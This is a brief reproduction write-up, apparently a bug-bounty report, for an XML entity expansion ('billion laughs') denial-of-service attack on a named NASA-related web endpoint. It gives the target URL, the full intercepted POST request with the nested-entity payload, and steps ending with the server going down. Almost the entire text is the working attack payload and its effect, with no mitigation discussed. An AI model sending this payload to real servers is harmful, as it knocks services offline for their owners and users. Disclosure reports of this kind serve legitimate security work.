1-go to https://capital.nasa.com/Events/Catg/12
2-intercept request:

		POST Events/Catg/12 HTTP/1.1
		Host: capital.nasa.com
		Content-type: text/xml
		Content-Length: 50

		<!--?xml version="1.0" ?-->
		<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
  		<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  		<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 		 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
		  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 		 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 		 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 		 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 		 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  		<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
		]>
		<tag>&lol9;</tag>
3-click on send , you ll see that the sever is not responding at all
4-go back to your browser you see that the server is down

